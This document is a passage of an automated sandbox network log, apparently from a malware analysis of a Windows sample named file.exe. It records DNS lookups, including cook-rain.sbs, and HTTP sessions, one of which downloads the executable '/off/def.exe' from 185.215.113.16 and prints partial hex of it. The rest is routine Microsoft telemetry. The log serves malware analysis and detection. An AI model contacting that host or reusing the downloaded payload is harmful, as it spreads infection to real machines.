                                                                                                                                                                                                            Nov 21, 2024 15:19:15.454245090 CET4435007513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.454358101 CET50075443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.454390049 CET50075443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.454412937 CET4435007513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.454448938 CET50075443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.454456091 CET4435007513.107.246.45192.168.2.6
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 21, 2024 15:17:08.855336905 CET6283253192.168.2.61.1.1.1
                                                                                                                                                                                                            Nov 21, 2024 15:17:09.116626024 CET53628321.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.668437004 CET53594831.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:44.670048952 CET53601781.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.143075943 CET53537951.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.557056904 CET5688553192.168.2.61.1.1.1
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.557236910 CET5097753192.168.2.61.1.1.1
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.783286095 CET53509771.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.783334970 CET53568851.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.523292065 CET6209753192.168.2.61.1.1.1
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.523539066 CET6503153192.168.2.61.1.1.1
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.326121092 CET53589361.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.949950933 CET5525053192.168.2.61.1.1.1
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.950236082 CET5671153192.168.2.61.1.1.1
                                                                                                                                                                                                            Nov 21, 2024 15:18:04.070462942 CET53505991.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:23.117122889 CET53559511.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.056196928 CET53505831.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.059365988 CET53511121.1.1.1192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.100344896 CET53562191.1.1.1192.168.2.6
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 21, 2024 15:17:08.855336905 CET192.168.2.61.1.1.10x863fStandard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.557056904 CET192.168.2.61.1.1.10x9ab7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.557236910 CET192.168.2.61.1.1.10x657eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.523292065 CET192.168.2.61.1.1.10xb25dStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.523539066 CET192.168.2.61.1.1.10x5e7cStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.949950933 CET192.168.2.61.1.1.10x1e17Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.950236082 CET192.168.2.61.1.1.10x4495Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 21, 2024 15:17:09.116626024 CET1.1.1.1192.168.2.60x863fNo error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:09.116626024 CET1.1.1.1192.168.2.60x863fNo error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.583450079 CET1.1.1.1192.168.2.60xf125No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.583450079 CET1.1.1.1192.168.2.60xf125No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.583450079 CET1.1.1.1192.168.2.60xf125No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.783286095 CET1.1.1.1192.168.2.60x657eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.783334970 CET1.1.1.1192.168.2.60x9ab7No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.755157948 CET1.1.1.1192.168.2.60xbf6fNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.755157948 CET1.1.1.1192.168.2.60xbf6fNo error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.755157948 CET1.1.1.1192.168.2.60xbf6fNo error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.755816936 CET1.1.1.1192.168.2.60x9ff0No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.758256912 CET1.1.1.1192.168.2.60xb25dNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.758256912 CET1.1.1.1192.168.2.60xb25dNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.758256912 CET1.1.1.1192.168.2.60xb25dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.758256912 CET1.1.1.1192.168.2.60xb25dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.759155035 CET1.1.1.1192.168.2.60x5e7cNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.759155035 CET1.1.1.1192.168.2.60x5e7cNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.706769943 CET1.1.1.1192.168.2.60x2e46No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.706769943 CET1.1.1.1192.168.2.60x2e46No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.706769943 CET1.1.1.1192.168.2.60x2e46No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.707123041 CET1.1.1.1192.168.2.60x7945No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:18:02.180100918 CET1.1.1.1192.168.2.60x4495No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 21, 2024 15:18:02.182687044 CET1.1.1.1192.168.2.60x1e17No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            • login.live.com
                                                                                                                                                                                                            • arc.msn.com
                                                                                                                                                                                                            • cook-rain.sbs
                                                                                                                                                                                                            • otelrules.azureedge.net
                                                                                                                                                                                                            • tse1.mm.bing.net
                                                                                                                                                                                                            • www.bing.com
                                                                                                                                                                                                            • ris.api.iris.microsoft.com
                                                                                                                                                                                                            • slscr.update.microsoft.com
                                                                                                                                                                                                            • g.bing.com
                                                                                                                                                                                                            • https:
                                                                                                                                                                                                              • js.monitor.azure.com
                                                                                                                                                                                                              • wcpstatic.microsoft.com
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.649778185.215.113.16804784C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.247291088 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985949993 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:33 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 2760192
                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 14:02:35 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "673f3d7b-2a1e00"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2a 00 00 04 00 00 65 91 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ *e*`Ui` @ @.rsrc`2@.idata 8@xadmgthi)):@csvsoobs `*)@.taggant@*")@
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985965967 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985975027 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985986948 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985999107 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986011028 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986022949 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986037970 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986052990 CET1236INData Raw: ee 5e f9 85 3e 32 f4 ab ae 3b 62 31 90 c6 80 6c 65 03 f1 1f 03 dc ea 27 76 0f 24 30 f3 81 01 61 34 f7 48 24 74 9a cb 64 a5 72 01 71 b6 e3 f8 26 6c db f4 f0 7d 25 12 65 f2 18 ab 8b 71 ed b7 6d 9e 9f e0 2d fd 4e cb bd 3f dd 63 35 fb a4 f4 bc 1c 5d
                                                                                                                                                                                                            Data Ascii: ^>2;b1le'v$0a4H$tdrq&l}%eqm-N?c5]u2Xp%Aem\9xfD4*'$Tb!Nr`Y<ABuCx.\]"@o12CU$LB 4J-26?3|.`5@SQ5A2
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986068010 CET1236INData Raw: 15 cc ca 46 0d 45 f3 2f 3c 9e c6 cf 24 9d fc 2f a1 bc f3 cb 34 b9 fa db 1f b0 75 56 03 5d 37 25 f4 4b c0 4e f6 48 82 ff 2a 15 f7 56 7d 10 2b a8 04 d0 08 56 ab e9 05 34 28 ff f1 21 80 c0 c6 a3 73 ba c4 3c 46 de 58 3d 76 bd e4 0e 22 0c fc 8a 3e cf
                                                                                                                                                                                                            Data Ascii: FE/<$/4uV]7%KNH*V}+V4(!s<FX=v">\haIP2#A<kz1#3G>5$`~}ZN@&Q1I|W{j`9nZ{+,o<:p):Onot<i+YR6S)iwgl+bi~
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986172915 CET1236INData Raw: 40 05 c2 84 25 08 86 8a a6 63 6b 3d 11 94 e8 59 dd 73 8e 38 e0 8f c0 2f 81 7d b7 3a 2d 76 14 77 57 a2 ec 25 da 27 47 a4 48 25 f1 fb 2e 07 33 2f 15 6b d2 56 d5 9e dd 58 48 65 e1 6e a0 87 8d f4 53 40 52 61 f5 85 c2 bb 95 aa d7 7b e5 93 90 84 82 76
                                                                                                                                                                                                            Data Ascii: @%ck=Ys8/}:-vwW%'GH%.3/kVXHenS@Ra{vh/D8bKB4^!!Sa9<Ulu$V"6%Wi@P+N-uW%dvgh %SZel:~~9!*1p6%+&s=-J{


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            0192.168.2.64970820.190.160.14443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:02 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/soap+xml
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                            Content-Length: 4831
                                                                                                                                                                                                            Host: login.live.com
                                                                                                                                                                                                            2024-11-21 14:17:02 UTC4831OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                            2024-11-21 14:17:03 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                            Expires: Thu, 21 Nov 2024 14:16:03 GMT
                                                                                                                                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                            x-ms-route-info: C558_BL2
                                                                                                                                                                                                            x-ms-request-id: bba8cac4-fc3f-4b2c-94de-fb91c51b23f8
                                                                                                                                                                                                            PPServer: PPV: 30 H: BL02EPF0001DA32 V: 0
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:02 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 11177
                                                                                                                                                                                                            2024-11-21 14:17:03 UTC11177INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            1192.168.2.64971020.223.35.26443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:05 UTC2587OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141651Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=f40d71fd2d2f41bca7c5c4d26e91b507&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595198&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595198&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED]
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6
                                                                                                                                                                                                            X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAdddCDU6xcjr4JQG4Q5CqQxYxRM7l7bC2MlFt9QO4Uu+ii8g720LG20edSSoTxnVPQfVrlOu/1noHbdP1+SiDi5DXdT/uC4gyHD0VoOT8ej2C+khCyhpug75SlIEjFej8fFvFo7FRZmWh8e545MnqHUljhAUzmKsKLRg/3UcXh4JkTf7zSwTP9Crj3xvwV1r5M6EZ2sADzFErRcH2T24HTT5pOeqDoqUYjhsuCPe3yRmQrN0Jxh9YUgKXYnq69TAggEbmdB1hu9ZbRMSeeNln3HQwGNpDyLAvfI/4qb8hmqcUU1ZMGFO6SmtXaqVqSt9dfRZCFSE0gLywHw9AU/GzhwQZgAAEFEx4GTAhho3OjsZqAmeDBGwAZrzfXIbMVmxY0gq43gsR+XFsMJV2em1OpWyTkKCsmCfRc0fQ2P3M5FixVfVvC6+Elf6vKcOvvh2O1ligabHXzOlv0+PIDskSvaKEEsNK4lFZgVuuCQvOcOeBFJFsoScYFvtgGuQFqbDJPhPXRk2Kns3oBWGkhojE39/8dhbMYxASaLuL6WGyWx5zYb5ofoKVgqa3ptlwEadefCXtg4fWmkirEAGZQaUFDXAU2t6EB61kHyIJcwVHqXJ2un3vVklw3loObixAHiUyJpucs9UOzZeo+QuKqRj9UBkZ0l+xHKRCSrHpOxSz2KC3NaERTi0TNkOyV2KPCwH/DiizCJkQat+YtCrfaUrnP8JpUx+sHRnirFRpxJie0ZUQ9EweMiOw9v3uqu/l+kr36/nMxN9zDoPFklZLXJwHnstSY3kHNbfUV00laThjc3ROnFULKiu9uplrlhqZuw1+UXjMoRKswiIfGoG2P/2TfNyGX+p2NQqqtWJJpacJswbPDatcvqWBUAK2nvgrOuvvuunq3A/uRzjbXrFE5SWyODjPGzEL9hUSiKn1V5c54BVjvH66nb0DNcB&p=
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            MS-CV: cfBi9oBThkS/fW90.0
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                                                                                                                                                            Host: arc.msn.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:06 UTC955INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Length: 3363
                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                            Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            ARC-RSP-DBG: [{"RADIDS":"1,P426081542-T1-C128000000001615609+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}]
                                                                                                                                                                                                            X-ARC-SIG: EWoRt+/wxSukf/7/G04meJe7qxR/tT8qHrJ7kChWCDG73cg1KC4nWarNhqj/7xTlBMUXaJDqVnoc69SLdfdvVG4kDmcR9Nl8aMMlnHazFhl0YCmZR2/qYk3kwVoCsyLdunm5a9p0HkYY00GVQWjKpA2cGYjwB8NgG3l8zuAjZR9IgqlLKt5PiliFeOrUwDEcFOOxxCOsIN+yFDhvmyooNY7ww9s5oRc2pLaeaLLvF9jQ9rF5mp0jR9bXPWdEU8157gRFucPx1/AZq9Fk/A+659trnA0TnZjL/Fr39jd6d7xjkBLnj+80pqZP0SRLfqOqH4OebQKLZ0IQZmEHKCta2Q==
                                                                                                                                                                                                            Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:05 GMT
                                                                                                                                                                                                            Connection: close
